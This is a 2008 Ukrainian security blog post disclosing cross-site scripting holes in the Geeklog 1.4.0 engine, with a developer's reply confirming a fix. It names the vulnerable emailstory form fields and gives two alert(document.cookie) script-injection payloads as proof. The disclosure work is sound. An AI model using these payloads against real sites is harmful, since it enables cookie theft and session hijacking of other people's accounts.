« Вийшов WordPress 2.3.2
Добірка уразливостей »

Уразливості в Geeklog

23:53 06.01.2008

Ще у лютому, 09.02.2007, я знайшов Cross-Site Scripting уразливості в движку Geeklog. Про що найближчим часом сповіщу розробникам.

Дані уразливості я виявив на ftpsearch.com.ua, який використовує цей движок. Хоча я і звернув увагу, що на сайті використовується Geeklog, але тоді не записав це собі. І от лише сьогодні, коли я оприлюднив деталі уразливостей на ftpsearch.com.ua, я знову звернув увагу, що на сайті використовується цей движок. Про уразливості в якому я і вирішив повідомити.

XSS:

POST запит на http://site/profiles.php?sid=1&what=emailstory:

"><script>alert(document.cookie)</script>В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.

</textarea><script>alert(document.cookie)</script>В полі: Короткое сообщение.


This entry was posted on 23:53 06.01.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

2 відповідей на “Уразливості в Geeklog”

  1. Dirk Haun каже:
    Вівторок, 21:32 08.01.2008

    Thanks for the report. This issue only existed in Geeklog 1.4.0 (not the current version 1.4.1). We have now also released an update for this old version.

  2. MustLive каже:
    Вівторок, 23:41 08.01.2008

    Dirk Haun

    You are welcome.

    It’s good that you quickly released update to fix these XSS holes (it’s very fast reaction). I recommend to all users of Geeklog 1.4.0 to update their engine.

Leave a Reply

You must be logged in to post a comment.